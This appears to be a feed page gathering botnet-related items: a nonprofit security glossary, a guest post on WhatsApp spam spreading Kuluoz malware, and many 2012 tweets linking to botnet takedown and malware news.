Tools: Bonesi - Simulate a HTTP GET BotNet DDoS Attack        

          A nonprofit's guide to online security: So you want to learn the lingo?        
This year marks the 25th anniversary of the World Wide Web becoming publicly available. For many of us, this is a reminder of just how much the Internet has transformed our daily lives. This rings true for nonprofits too: The Internet has revolutionized the way that nonprofits communicate, fundraise, and recruit volunteers. It has enabled nonprofits like yours to share their mission with a global audience. To raise awareness. And to change the world. 

But the power of the Internet also comes with great responsibility -- namely the need to keep information safe and secure. As a nonprofit, it can be difficult to keep up with online security, especially when terminology seems complicated. Yes, you might have heard of terms like “phishing” or “cookies,” but what do they mean?

Today, you can find the answers to your questions with our quick & easy to guide to online security terminology. In less than five minutes, you’ll be well on the way to helping keep your nonprofit safe on the Internet. 

Let’s get started! Here’s a quick guide to familiarize yourself with common lingo and learn how to distinguish terms that are friends vs foes in the online security realm. 


THE BAD GUYS: MALICIOUS ACTIONS/TERMS

  • Advanced Fee Fraud (419 scams): A technique which tricks users into sending or paying money to fraudsters on the promise of receiving greater rewards afterwards. It is most commonly associated with Nigeria, and 419 is the section of the Nigerian legal code that covers this fraud.
  • Botnet: A network of computers that are infected with malicious software without users’ knowledge, used to send viruses and spam to other computers.
  • Malware: Malicious software with the purpose of infecting devices and systems, gathering personal information, gaining access to systems or disrupting the operations of the device or systems. Essentially, any software that maliciously alters or compromises the system or device.
  • Phishing / Social Engineering Attack: An attempt by hackers who pose as trustworthy individuals or businesses in order to get your personal information such as usernames, passwords, and financial information.
  • Trojans: Malicious programs posing as or bundled with legitimate ones, which are designed to compromise your system. They are usually installed on computers from opening attachments in scam emails or by visiting infected websites. The term comes from the Trojan Horse in Greek mythology.

How to avoid social engineering attacks

THE GOOD GUYS: ONLINE SAFETY TERMS


  • [Internet] Cookie: A piece of data from a visited website and stored in the user's web browser in order to remember information that the user has entered or engaged with such as items in a shopping basket on an e-commerce site.
  • Encryption: The process of encoding data, messages, or information, such that only authorized parties can read it.
  • Firewall: A security system used to block hackers, viruses, and other malicious threats to your computer. It does this by acting as a barrier, acting on predetermined rules, which allows trusted traffic but blocks untrusted or non-secure traffic. 
  • HTTPS (Hypertext Transfer Protocol): is the protocol for secure communications over a computer network used on the Internet. It essentially provides authentication of the website and the web servers associated with it. 
  • Transport Layer Security (TLS): TLS is a protocol that encrypts and delivers mail securely, both for inbound and outbound mail traffic. It helps prevent eavesdropping between mail servers – keeping your messages private while they're moving between email providers. 
  • Two Factor Authentication / Two Step Verification: A method of using an additional process to verify your identity online. It combines both ‘something you know’ (like a password) and ‘something you have’ (like your phone or security key) — similar to withdrawing money from an ATM/cash machine, where you need both your PIN and your bank card.

That’s a wrap for now! Pass on these tips to your nonprofit partners to stay safe and secure online, so you can focus on what matters most: changing the world. 

//

To see if your nonprofit is eligible to participate, review the Google for Nonprofits eligibility guidelines. Google for Nonprofits offers organizations like yours access to Google tools like Gmail, Google Calendar, Google Drive, Google Ad Grants, YouTube for Nonprofits and more at no charge. These tools can help you reach new donors and volunteers, work more efficiently, and tell your nonprofit’s story. Learn more and enroll here.


          WhatsApp spam used by ASProx Botnet to Deliver Kuluoz Malware        

5448944597_8e70da64ab_o.png

Photo by: Sean MacEntee




As you probably know, Facebook bought WhatsApp for an obscene amount of money in stock earlier this year. What you might not know is that there's a lot of WhatsApp spam that is being used by ASProx Botnet to deliver nasty Kuluoz malware to unsuspecting  users. This is not good news any way you look at the situation. Keep reading if you want to know more about this as well as what you should do to stay safe.


Here's a look at some of the dates when the WhatsApp problem has made Malcovery's "Today's Top Threats" list.


  1. SEPTEMBER 19, 23, 24, 25, 26
  2. OCTOBER 2, 3, 4, 7, 8, 9, 10, 11, 16, 17, 18, 21, 22, 23, 24, 25
  3. NOVEMBER 14
  4. JANUARY 9, 13, 15, 20, 28


Looking at that list, it's easy to start wondering why nothing has been done sooner about the problem. Additionally, it really makes you wonder why Facebook paid so much for the company by offering them stock options.


Going back to November of last year, ComputerWorld published an article about how WhatsApp was one of the top five brands imitated to deliver malware with spam. That's quite a bit of recognition - and not in a good way.


Here's a look at some specific ways you can stay safe and avoid Kuluoz and other malware.

  • Use Protection - The very first thing you want to do is make sure you're using some type of protection. The good news is that you don't need to spend a lot of money to get decent anti-virus software these days.
  • Update Protection - Having protection software is nice, but if you never update it at all, you're going to find that there's still a high chance your computer will get infected and quit working correctly.
  • Be Suspicious - If you're not sure of something online, you want to err on the side of caution and not take any unnecessary risks. Even with a brand like WhatsApp - that's connected to Facebook now - you want to be very careful and know what you're doing.
  • Educate Yourself - Last but most certainly not least, you should make an effort to stay informed about how malware works and the steps you can take to protect yourself from it whenever possible. This is really the best way you can make sure your computer stays safe and virus free.


Following the advice above, there's a good chance you'll be able to avoid WhatsApp spam and not get infected with Kuluoz malware. Still, it's a good idea to pay attention and update your anti-virus software all the time. If you have any experience with WhatsApp that's negative, please leave us a comment below. 







Guest Post - 
 
Written by: Jenny Corteza deals with staff outsourcing all the time. She's a writer and dealing with editors and others can sometimes be a problem. Still, she loves writing articles about technology. Go figure.






          ZOMBIES        

Entidades financieras inviables que se mantienen artificialmente

Otra acepción: ver BOTNET.


           Skype targeted by botnet malware http://tco/OMts7XyK        
2012-10-10 12:15:41 - securitypro2009 : Skype targeted by botnet malware http://tco/OMts7XyK
           Android adware, Zitmo botnets and Romanian hackers, oh my: We're not in Kansas anymore: The third quarter of 20 http://tco/T01wAZNW        
2012-10-09 22:46:35 - obsequens : Android adware, Zitmo botnets and Romanian hackers, oh my: We're not in Kansas anymore: The third quarter of 20 http://tco/T01wAZNW
           RT @helpnetsecurity: Proxy service users download malware, unknowingly join botnet http://tco/mEYbYpka //How ironic        
2012-10-09 22:10:37 - grecs : RT @helpnetsecurity: Proxy service users download malware, unknowingly join botnet http://tco/mEYbYpka //How ironic
           Android adware, Zitmo botnets and Romanian hackers, oh my http://tco/XTSQTT7u        
2012-10-09 21:48:13 - InfosecurityMag : Android adware, Zitmo botnets and Romanian hackers, oh my http://tco/XTSQTT7u
           Proxy service users download malware, unknowingly join botnet http://tco/ysMfdCzG        
2012-10-09 17:05:31 - CanDeger : Proxy service users download malware, unknowingly join botnet http://tco/ysMfdCzG
           Proxy service users download malware, unknowingly join botnet - http://tco/QgTfPr70        
2012-10-09 16:21:37 - helpnetsecurity : Proxy service users download malware, unknowingly join botnet - http://tco/QgTfPr70
           Proxy service users download malware, unknowingly join botnet http://tco/y1VflHPk        
2012-10-09 15:40:38 - DarkOperator : Proxy service users download malware, unknowingly join botnet http://tco/y1VflHPk
           @binjo i will be coming for presenting stuff about analysis Festi botnet ;        
2012-10-09 14:25:32 - matrosov : @binjo i will be coming for presenting stuff about analysis Festi botnet ;
           Proxy service users download malware, unknowingly join botnet http://tco/9YGJkW2n        
2012-10-09 11:20:11 - ITVulnerability : Proxy service users download malware, unknowingly join botnet http://tco/9YGJkW2n
           Infosec - Microsoft settles lawsuit against 3322 dot org, reveals scale of Nitol botnet in China http://tco/GyHKyL0v        
2012-10-06 19:01:15 - AlertBoot : Infosec - Microsoft settles lawsuit against 3322 dot org, reveals scale of Nitol botnet in China http://tco/GyHKyL0v
           Microsoft settles lawsuit against 3322 dot org, reveals scale of Nitol botnet in China http://tco/Hb7cmnNn        
2012-10-06 12:41:42 - gcluley : Microsoft settles lawsuit against 3322 dot org, reveals scale of Nitol botnet in China http://tco/Hb7cmnNn
           Inside Microsoft's botnet takedowns http://tco/3bYBghJz        
2012-10-06 06:33:42 - securitypro2009 : Inside Microsoft's botnet takedowns http://tco/3bYBghJz
           Scanning botnets are old botnets interesting to see how they are still active and dangerous though http://tco/QjbPwcYh        
2012-10-06 00:37:05 - gianlucaSB : Scanning botnets are old botnets interesting to see how they are still active and dangerous though http://tco/QjbPwcYh
           RT @CyberExaminer: Visualizing the ZeroAccess botnet in Google Earth http://tco/DHAlZgiW #infosec        
2012-10-05 22:20:25 - opexxx : RT @CyberExaminer: Visualizing the ZeroAccess botnet in Google Earth http://tco/DHAlZgiW #infosec
           Microsoft settles lawsuit against 3322 dot org, reveals scale of Nitol botnet in China http://tco/gfSydpMP        
2012-10-05 22:06:37 - ITVulnerability : Microsoft settles lawsuit against 3322 dot org, reveals scale of Nitol botnet in China http://tco/gfSydpMP
           Sality botnet spotted stealthily scanning IPv4 address space for vulnerable VoIP--caught on 'network telescope': http://tco/G6M4BM7O        
2012-10-05 21:17:31 - DarkReading : Sality botnet spotted stealthily scanning IPv4 address space for vulnerable VoIP--caught on 'network telescope': http://tco/G6M4BM7O
           Microsoft settles lawsuit against 3322 dot org, reveals scale of Nitol botnet in China: Just over two weeks ago, http://tco/wvJohCv7        
2012-10-05 12:00:39 - EvilFingers : Microsoft settles lawsuit against 3322 dot org, reveals scale of Nitol botnet in China: Just over two weeks ago, http://tco/wvJohCv7
           Microsoft settles lawsuit against 3322 dot org, reveals scale of Nitol botnet in China http://tco/ez2qnzBS        
2012-10-05 10:01:21 - teksquisite : Microsoft settles lawsuit against 3322 dot org, reveals scale of Nitol botnet in China http://tco/ez2qnzBS
           http://tco/DJyOCByC - una botnet social        
2012-10-05 08:22:30 - Xyborg : http://tco/DJyOCByC - una botnet social
           Microsoft settles Nitol botnet lawsuit http://tco/MhDAzRxb        
2012-10-05 01:18:51 - ITVulnerability : Microsoft settles Nitol botnet lawsuit http://tco/MhDAzRxb
           Chinese Nitol botnet host back up after Microsoft settles lawsuit http://tco/bAGoDybf        
2012-10-04 19:26:06 - DarkOperator : Chinese Nitol botnet host back up after Microsoft settles lawsuit http://tco/bAGoDybf
           Chinese Nitol botnet host back up after Microsoft settles lawsuit: Owner agrees to chuck nasties down the sinkhole … http://tco/8RSgDaCm        
2012-10-04 19:03:16 - regsecurity : Chinese Nitol botnet host back up after Microsoft settles lawsuit: Owner agrees to chuck nasties down the sinkhole … http://tco/8RSgDaCm
           Chinese Nitol botnet host back up after Microsoft settles lawsuit http://tco/BZMIJaky        
2012-10-04 17:23:35 - kakroo : Chinese Nitol botnet host back up after Microsoft settles lawsuit http://tco/BZMIJaky
           One botnet to rull them all #BoteAR , the new tool that will rull us all from exploit pack        
2012-10-04 16:17:16 - w3af : One botnet to rull them all #BoteAR , the new tool that will rull us all from exploit pack
           @Microsoft settles w/ Chinese site hosting 500 #malware variants preloaded machines with the Nitol botnet malware - http://tco/g3DagHXc        
2012-10-04 11:09:00 - threatpost : @Microsoft settles w/ Chinese site hosting 500 #malware variants preloaded machines with the Nitol botnet malware - http://tco/g3DagHXc
           Zombie-animating malnets increase 300 pourcents in just 6 months: Cybercrooks beef up botnet-powering badness Crybercrooks a… http://tco/N1zlIV2X        
2012-10-04 10:24:18 - regsecurity : Zombie-animating malnets increase 300 pourcents in just 6 months: Cybercrooks beef up botnet-powering badness Crybercrooks a… http://tco/N1zlIV2X
           Microsoft wins permanent settlement against Nitol botnet Computer News http://tco/w80UzNvF        
2012-10-04 07:16:59 - securitypro2009 : Microsoft wins permanent settlement against Nitol botnet Computer News http://tco/w80UzNvF
           NEW: Microsoft wins permanent settlement against Nitol botnet: http://tco/MQf3Ong9        
2012-10-04 03:41:05 - CSOonline : NEW: Microsoft wins permanent settlement against Nitol botnet: http://tco/MQf3Ong9
           US bank site hackers used advanced botnets http://tco/S2XSt8WG        
2012-10-04 03:21:12 - DarkOperator : US bank site hackers used advanced botnets http://tco/S2XSt8WG
           RT @DarkReading: Microsoft hands off Nitol botnet sinkhole operation to Chinese CERT: http://tco/iJZFlsK0 //What        
2012-10-04 00:20:58 - grecs : RT @DarkReading: Microsoft hands off Nitol botnet sinkhole operation to Chinese CERT: http://tco/iJZFlsK0 //What
           RT @Tris_Acatrinei: Lu Un premier moyen de protection contre les botnets est de disposer d’un routeur ^^        
2012-10-03 18:32:21 - bortzmeyer : RT @Tris_Acatrinei: Lu Un premier moyen de protection contre les botnets est de disposer d’un routeur ^^
           Zombie-animating malnets increase 300 pourcents in just 6 months - Cybercrooks beef up botnet-powering badness Crybercrooks a http://tco/5VpKK326        
2012-10-03 17:31:33 - kakroo : Zombie-animating malnets increase 300 pourcents in just 6 months - Cybercrooks beef up botnet-powering badness Crybercrooks a http://tco/5VpKK326
           Zombie-animating malnets increase 300 pourcents in just 6 months: Cybercrooks beef up botnet-powering badnessCrybercrook http://tco/myJgj2iq        
2012-10-03 16:05:24 - obsequens : Zombie-animating malnets increase 300 pourcents in just 6 months: Cybercrooks beef up botnet-powering badnessCrybercrook http://tco/myJgj2iq
           Microsoft hands off Nitol botnet sinkhole operation to Chinese CERT: http://tco/tzTgR3s7        
2012-10-03 14:39:12 - DarkReading : Microsoft hands off Nitol botnet sinkhole operation to Chinese CERT: http://tco/tzTgR3s7
           @codeslack @DouglasBrush Well I don't like to brag about the size of my botnet, but        
2012-10-03 12:13:02 - hal_pomeranz : @codeslack @DouglasBrush Well I don't like to brag about the size of my botnet, but
           US bank website hackers used advanced botnets, diverse tools News http://tco/HBvd7zY9 ecosystem        
2012-10-03 11:33:05 - DrInfoSec : US bank website hackers used advanced botnets, diverse tools News http://tco/HBvd7zY9 ecosystem
           Microsoft wins permanent settlement against Nitol botnet: Microsoft has won a battle to permanently disrupt a ha http://tco/j86MBuCv        
2012-10-03 05:19:53 - hackinthebox : Microsoft wins permanent settlement against Nitol botnet: Microsoft has won a battle to permanently disrupt a ha http://tco/j86MBuCv
           Am I just naive here when I say that the attackers only have ~700 nodes in a hand-built botnet using VPS nodes, not a 20K node botnet        
2012-10-02 10:15:51 - rybolov : Am I just naive here when I say that the attackers only have ~700 nodes in a hand-built botnet using VPS nodes, not a 20K node botnet
           @daviottenheimer @attritionorg @mckeay that botnet winter will block out the sun1 Oh wait, winter is gaming season        
2012-10-02 04:16:48 - TimelessP : @daviottenheimer @attritionorg @mckeay that botnet winter will block out the sun1 Oh wait, winter is gaming season
           RT @unixfreaxjp: #ZeuS botnet no longer needs central command servers, invalidating security mechanisms to detect Zeus http://tco/LWaC3         
2012-10-01 22:56:16 - ChristiaanBeek : RT @unixfreaxjp: #ZeuS botnet no longer needs central command servers, invalidating security mechanisms to detect Zeus http://tco/LWaC3
           Zombies are attacking America – researchers: Banking sector DDoSers 'used botnets', say security boffinsHackers http://tco/0dxnCC8y        
2012-09-30 09:26:38 - obsequens : Zombies are attacking America – researchers: Banking sector DDoSers 'used botnets', say security boffinsHackers http://tco/0dxnCC8y
           Zombies are attacking America – researchers: Banking sector DDoSers 'used botnets', say security boffins Hackers re… http://tco/D92gSxDw        
2012-09-30 03:40:57 - regsecurity : Zombies are attacking America – researchers: Banking sector DDoSers 'used botnets', say security boffins Hackers re… http://tco/D92gSxDw
           A powerful server doesn't equal a successful DDoS attack Go through 7 examples of crowdsourced opt-in botnet campaigns http://tco/XzusIHFR        
2012-09-29 19:39:08 - danchodanchev : A powerful server doesn't equal a successful DDoS attack Go through 7 examples of crowdsourced opt-in botnet campaigns http://tco/XzusIHFR
           Zombies are attacking America – researchers: Banking sector DDoSers 'used botnets', say security boffins Hackers http://tco/vbprV69b        
2012-09-29 18:38:16 - ElReg : Zombies are attacking America – researchers: Banking sector DDoSers 'used botnets', say security boffins Hackers http://tco/vbprV69b
           ZeroAccess botnet large enough to net $100,000 per day for the bad guys http://tco/T3fVZ4aX        
2012-09-29 17:34:35 - klightowler : ZeroAccess botnet large enough to net $100,000 per day for the bad guys http://tco/T3fVZ4aX
           Zombies are attacking America – researchers - Banking sector DDoSers 'used botnets', say security boffins Hackers re http://tco/m6LZefX4        
2012-09-29 17:30:16 - kakroo : Zombies are attacking America – researchers - Banking sector DDoSers 'used botnets', say security boffins Hackers re http://tco/m6LZefX4
           Inside #Microsoft botnet takedowns http://tco/3HZ3Rvdl via @networkworld #infosec        
2012-09-28 15:42:26 - GFISoftware : Inside #Microsoft botnet takedowns http://tco/3HZ3Rvdl via @networkworld #infosec
           That was quick 3322org is back in original hands Did Microsoft's Operation b70 flip-flop No damage done to the botnets        
2012-09-28 12:45:53 - gollmann : That was quick 3322org is back in original hands Did Microsoft's Operation b70 flip-flop No damage done to the botnets
           How to prevent a botnet infection http://tco/xroZxDH6        
2012-09-28 05:50:03 - helpnetsecurity : How to prevent a botnet infection http://tco/xroZxDH6
           New variant of TDL-4 botnet includes capability to generate 'disposable' CC http://tco/M3Q2Darr        
2012-09-28 00:23:06 - securitypro2009 : New variant of TDL-4 botnet includes capability to generate 'disposable' CC http://tco/M3Q2Darr
           New variant of TDL-4 botnet includes capability to generate 'disposable' CC http://tco/ZVMtnkhh        
2012-09-28 00:23:06 - securitypro2009 : New variant of TDL-4 botnet includes capability to generate 'disposable' CC http://tco/ZVMtnkhh
           Over 9 million PCs infected ZeroAccess botnet uncovered | Naked http://tco/IKtbRqS2        
2012-09-28 00:23:06 - securitypro2009 : Over 9 million PCs infected ZeroAccess botnet uncovered | Naked http://tco/IKtbRqS2
           Inside Microsoft botnet takedowns http://tco/IkeuGgO3        
2012-09-28 00:23:06 - securitypro2009 : Inside Microsoft botnet takedowns http://tco/IkeuGgO3
           RT @atttechchannel: ThreatTraq covers new Blackhole Exploit Kit, ZeroAccess botnet and notable network activity - http://tco/603MBVNL #fb        
2012-09-27 12:48:56 - jclausing : RT @atttechchannel: ThreatTraq covers new Blackhole Exploit Kit, ZeroAccess botnet and notable network activity - http://tco/603MBVNL #fb
           New variant of TDL-4 botnet includes capability to generate 'disposable' CC domain names http://tco/fm0q8KhI SC Mag        
2012-09-27 09:44:59 - ITDataSecurity : New variant of TDL-4 botnet includes capability to generate 'disposable' CC domain names http://tco/fm0q8KhI SC Mag
           New variant of TDL-4 botnet includes capability to generate 'disposable' CC domain names - SC Magazine UK http://tco/aqC0iAJ5        
2012-09-27 06:32:37 - SCmagazineUK : New variant of TDL-4 botnet includes capability to generate 'disposable' CC domain names - SC Magazine UK http://tco/aqC0iAJ5
           RT @Donotgiveintoev: @th3j35t3r Wouldn't surprise me if William Welna set up a DotTK account with a botnet http://tco/al2Oo0rk Just a         
2012-09-22 16:15:12 - mosesrenegade : RT @Donotgiveintoev: @th3j35t3r Wouldn't surprise me if William Welna set up a DotTK account with a botnet http://tco/al2Oo0rk Just a
           'Dead' #Flashback botnet descibed as the most widespread Apple Mac malware to date - SC Magazine UK http://tco/UQIfgG6U        
2012-09-22 12:39:47 - SCmagazineUK : 'Dead' #Flashback botnet descibed as the most widespread Apple Mac malware to date - SC Magazine UK http://tco/UQIfgG6U
           'Dead' Flashback botnet descibed as widespread Mac malware to date http://tco/ICRP9TkZ SC Mag        
2012-09-21 22:56:35 - ITDataSecurity : 'Dead' Flashback botnet descibed as widespread Mac malware to date http://tco/ICRP9TkZ SC Mag
           'Dead' Flashback botnet descibed as the most widespread Mac malware to date http://tco/1NwlnU59 SC Mag        
2012-09-21 22:56:35 - ITDataSecurity : 'Dead' Flashback botnet descibed as the most widespread Mac malware to date http://tco/1NwlnU59 SC Mag
           Lucrative ZeroAccess botnet enslaves one million active computers http://tco/5wVpn8c0        
2012-09-21 15:06:46 - ITVulnerability : Lucrative ZeroAccess botnet enslaves one million active computers http://tco/5wVpn8c0
           Lucrative ZeroAccess botnet enslaves one million active computers http://tco/HFjtwRwF        
2012-09-21 03:11:42 - CanDeger : Lucrative ZeroAccess botnet enslaves one million active computers http://tco/HFjtwRwF
           Lucrative ZeroAccess botnet enslaves one million active computers - http://tco/vN98andQ        
2012-09-21 01:02:41 - helpnetsecurity : Lucrative ZeroAccess botnet enslaves one million active computers - http://tco/vN98andQ
           Lucrative ZeroAccess botnet enslaves one million active computers http://tco/A31ClPqV        
2012-09-20 23:14:33 - DarkOperator : Lucrative ZeroAccess botnet enslaves one million active computers http://tco/A31ClPqV
           Infosec - Over 9 million PCs infected - ZeroAccess botnet uncovered http://tco/5kV80kxg        
2012-09-20 21:15:01 - AlertBoot : Infosec - Over 9 million PCs infected - ZeroAccess botnet uncovered http://tco/5kV80kxg
           New Video's CIC News 19-09-2012: Flame, IE vuln, TDSS botnet http://tco/ZY2cxVHV        
2012-09-20 19:18:26 - privelege : New Video's CIC News 19-09-2012: Flame, IE vuln, TDSS botnet http://tco/ZY2cxVHV
           Over 9 million PCs infected - ZeroAccess botnet uncovered: ZeroAccess is a hugely widespread malware threat that http://tco/5XeYZjME        
2012-09-20 14:38:13 - EvilFingers : Over 9 million PCs infected - ZeroAccess botnet uncovered: ZeroAccess is a hugely widespread malware threat that http://tco/5XeYZjME
           Over 9 million PCs infected - ZeroAccess botnet uncovered http://tco/0jShrzpS        
2012-09-20 13:38:30 - ITVulnerability : Over 9 million PCs infected - ZeroAccess botnet uncovered http://tco/0jShrzpS
           TDSS/TDL4 'indestructible botnet' is back with 250K victims already http://tco/sHOfe137        
2012-09-20 12:56:02 - InfosecurityMag : TDSS/TDL4 'indestructible botnet' is back with 250K victims already http://tco/sHOfe137
           Over 9 million PCs infected - ZeroAccess botnet uncovered http://tco/DSZO3ZUV        
2012-09-20 12:33:03 - securitypro2009 : Over 9 million PCs infected - ZeroAccess botnet uncovered http://tco/DSZO3ZUV
           Over 9 million PCs infected – ZeroAccess botnet uncovered, and hackers earning $100,000 per day http://tco/P5oFU3ML        
2012-09-20 11:59:57 - SophosLabs : Over 9 million PCs infected – ZeroAccess botnet uncovered, and hackers earning $100,000 per day http://tco/P5oFU3ML
           News Over 9 million PCs infected - ZeroAccess botnet uncovered http://tco/CE6FIdXR        
2012-09-20 10:40:24 - SecurityTube : News Over 9 million PCs infected - ZeroAccess botnet uncovered http://tco/CE6FIdXR
           RT @yo9fah Over 9 million PCs infected - ZeroAccess botnet uncovered http://tco/N8jBTvws -- mainly in USA, mining BitCoins        
2012-09-20 08:08:36 - sambowne : RT @yo9fah Over 9 million PCs infected - ZeroAccess botnet uncovered http://tco/N8jBTvws -- mainly in USA, mining BitCoins
           Over 9 million PCs infected – ZeroAccess botnet uncovered http://tco/IuP2kcsA        
2012-09-20 04:51:12 - gcluley : Over 9 million PCs infected – ZeroAccess botnet uncovered http://tco/IuP2kcsA
           9 million PCs infected with ZeroAccess botnet http://tco/6ptBuLYY        
2012-09-20 03:09:57 - CanDeger : 9 million PCs infected with ZeroAccess botnet http://tco/6ptBuLYY
           Over 9 million PCs infected - ZeroAccess botnet uncovered http://tco/YzdEMDgx #security        
2012-09-20 01:45:16 - eEye : Over 9 million PCs infected - ZeroAccess botnet uncovered http://tco/YzdEMDgx #security
           Pushdo botnet's smokescreen traffic hits legitimate websites: Aargh, cap'n, the server be like to founder Cybercroo… http://tco/MQNanwXC        
2012-09-19 23:47:12 - regsecurity : Pushdo botnet's smokescreen traffic hits legitimate websites: Aargh, cap'n, the server be like to founder Cybercroo… http://tco/MQNanwXC
           Pushdo botnet's smokescreen traffic hits legitimate websites http://tco/4PzrvZma        
2012-09-19 19:19:14 - kakroo : Pushdo botnet's smokescreen traffic hits legitimate websites http://tco/4PzrvZma
           Microsoft distrupts Nitol botnet, malware hidden in supply chain http://tco/GAreOqau The supply chain risk is a worrying trend        
2012-09-19 19:02:07 - DFMag : Microsoft distrupts Nitol botnet, malware hidden in supply chain http://tco/GAreOqau The supply chain risk is a worrying trend
           Grum Botnet Attempts Another Comeback, Fails Again: The Grum botnet, which Dutch authorities and security resear http://tco/ToLptDPc        
2012-09-19 15:50:07 - EvilFingers : Grum Botnet Attempts Another Comeback, Fails Again: The Grum botnet, which Dutch authorities and security resear http://tco/ToLptDPc
           Pushdo botnet's smokescreen traffic hits legitimate websites • The http://tco/Qa14razo        
2012-09-19 13:38:16 - securitypro2009 : Pushdo botnet's smokescreen traffic hits legitimate websites • The http://tco/Qa14razo
           New version of TDL4 botnet discovered http://tco/I2mP1Wkw via @CSOonline #SaltedHash        
2012-09-19 03:32:27 - BillBrenner70 : New version of TDL4 botnet discovered http://tco/I2mP1Wkw via @CSOonline #SaltedHash
           G+: The Flame CC developers didn't use professional ha-ha AC terms such as bot, botnet, infection,… http://tco/Ew8uDN6P        
2012-09-19 03:17:05 - anton_chuvakin : G+: The Flame CC developers didn't use professional ha-ha AC terms such as bot, botnet, infection,… http://tco/Ew8uDN6P
           RT @mikko: Botnet herders will often rent out access to their botnets, billing in 15 minute increments just like lawyers http://tc         
2012-09-18 21:24:06 - alessiomarziali : RT @mikko: Botnet herders will often rent out access to their botnets, billing in 15 minute increments just like lawyers http://tc
           A botnet is a network of infected PCs that can be controlled remotely Here's what one might look like from space http://tco/LLTK1hTs        
2012-09-18 19:33:29 - FSecure : A botnet is a network of infected PCs that can be controlled remotely Here's what one might look like from space http://tco/LLTK1hTs
           SSCC 98 - RSA key safety, Blackhole exploit kit updated, Nitol botnet takedown and Apache takes potshots at Micr http://tco/btDcU5Qx        
2012-09-18 16:24:37 - EvilFingers : SSCC 98 - RSA key safety, Blackhole exploit kit updated, Nitol botnet takedown and Apache takes potshots at Micr http://tco/btDcU5Qx
           SSCC 98 - RSA key safety, Blackhole exploit kit updated, Nitol botnet takedown and Apache takes potshots at Microsoft http://tco/QxkeiTeQ        
2012-09-18 15:29:49 - ITVulnerability : SSCC 98 - RSA key safety, Blackhole exploit kit updated, Nitol botnet takedown and Apache takes potshots at Microsoft http://tco/QxkeiTeQ
           Microsoft applies 'surgical sinkhole' to strangle botnet installed on new PCs via http://tco/atVnSJF8 @gkeizer #malware #cybersecurity        
2012-09-18 13:23:20 - CoreSecurity : Microsoft applies 'surgical sinkhole' to strangle botnet installed on new PCs via http://tco/atVnSJF8 @gkeizer #malware #cybersecurity
           SSCC 98 - RSA key safety, Blackhole exploit kit updated, Nitol botnet takedown and Apache takes potshots at Microsoft http://tco/wHf9RkY1        
2012-09-18 12:15:26 - teksquisite : SSCC 98 - RSA key safety, Blackhole exploit kit updated, Nitol botnet takedown and Apache takes potshots at Microsoft http://tco/wHf9RkY1
           Week in review: Blackhole 20 is out, Windows 8 users open to Flash exploits, and botnet CCs hidden in the Tor network -        
2012-09-18 03:49:20 - helpnetsecurity : Week in review: Blackhole 20 is out, Windows 8 users open to Flash exploits, and botnet CCs hidden in the Tor network -
           The Flame CC developers didn't use terms such as bot, botnet, malware or anything related in their control panel http://tco/rqt33kSO        
2012-09-18 00:24:54 - gianlucaSB : The Flame CC developers didn't use terms such as bot, botnet, malware or anything related in their control panel http://tco/rqt33kSO
           Microsoft disrupts Nitol botnet, outs hidden PS malware Search Security http://tco/OHf77UYQ        
2012-09-17 23:41:48 - AVGFree : Microsoft disrupts Nitol botnet, outs hidden PS malware Search Security http://tco/OHf77UYQ
           Week in review: Blackhole 20 is out, Windows 8 users open to Flash exploits, and botnet CCs hidden in the Tor network http://tco/x4Wr90qO        
2012-09-17 18:36:55 - ITVulnerability : Week in review: Blackhole 20 is out, Windows 8 users open to Flash exploits, and botnet CCs hidden in the Tor network http://tco/x4Wr90qO
           Week in review: Blackhole 20 is out, Windows 8 users open to Flash exploits, and botnet CCs hidden in the Tor network http://tco/jYx1eRko        
2012-09-17 07:58:02 - DarkOperator : Week in review: Blackhole 20 is out, Windows 8 users open to Flash exploits, and botnet CCs hidden in the Tor network http://tco/jYx1eRko
           Microsoft distrupts Nitol botnet, malware hidden in supply chain http://tco/rS3a8WoR        
2012-09-17 03:00:11 - darinandersen : Microsoft distrupts Nitol botnet, malware hidden in supply chain http://tco/rS3a8WoR
           Microsoft takes down another botnet, #Nitol http://tco/3bzq7bvk via @networkworld #Microsoft        
2012-09-16 21:11:08 - GFISoftware : Microsoft takes down another botnet, #Nitol http://tco/3bzq7bvk via @networkworld #Microsoft
           Microsoft battles botnet preinstalled on systems | PCWorld http://tco/KoGdlw50        
2012-09-16 15:29:11 - securitypro2009 : Microsoft battles botnet preinstalled on systems | PCWorld http://tco/KoGdlw50
           News: Microsoft disrupts Nitol botnet, outs hidden PC malware http://tco/GfiuejN8        
2012-09-15 12:32:37 - SearchSecurity : News: Microsoft disrupts Nitol botnet, outs hidden PC malware http://tco/GfiuejN8
           Microsoft applies 'surgical sinkhole' to strangle botnet installed on new PCs http://tco/2w2UcrV3 #derbycon #nitol        
2012-09-15 11:07:14 - theprez98 : Microsoft applies 'surgical sinkhole' to strangle botnet installed on new PCs http://tco/2w2UcrV3 #derbycon #nitol
           WatchGuard Security Week in Review Episode 33 is ready for viewing consumption Covers botnets, HTTPS attacks, APTs: http://tco/z8MWWe3N        
2012-09-15 03:41:24 - watchguardtech : WatchGuard Security Week in Review Episode 33 is ready for viewing consumption Covers botnets, HTTPS attacks, APTs: http://tco/z8MWWe3N
           Microsoft disrupts Nitol botnet, outs hidden PC malware: The Nitol botnet controlled more than 500 strains of em http://tco/v3ne5UUr        
2012-09-15 01:40:44 - obsequens : Microsoft disrupts Nitol botnet, outs hidden PC malware: The Nitol botnet controlled more than 500 strains of em http://tco/v3ne5UUr
           Microsoft disrupts Nitol botnet and takes control of malware hosting domain - SC Magazine UK http://tco/As24AQUw        
2012-09-15 00:48:37 - SCmagazineUK : Microsoft disrupts Nitol botnet and takes control of malware hosting domain - SC Magazine UK http://tco/As24AQUw
           WatchGuard Security Week in Review Episode 33 is ready for viewing consumption Covers botnets, HTTPS attacks, APTs: http://tco/pzwi5YBV        
2012-09-14 20:18:22 - SecAdept : WatchGuard Security Week in Review Episode 33 is ready for viewing consumption Covers botnets, HTTPS attacks, APTs: http://tco/pzwi5YBV
           NEW: Microsoft downs botnet that infiltrated Chinese PC supply chain http://tco/8D4f2ukM        
2012-09-14 19:18:11 - CSOonline : NEW: Microsoft downs botnet that infiltrated Chinese PC supply chain http://tco/8D4f2ukM
           7 consejos básicos para proteger tu ordenador de los ataques de botnets http://tco/NKCKcrEN        
2012-09-14 18:21:09 - DarkOperator : 7 consejos básicos para proteger tu ordenador de los ataques de botnets http://tco/NKCKcrEN
           Microsoft disrupts Nitol botnet and takes control of malware hosting domain http://tco/LMIMfgIs SC Mag        
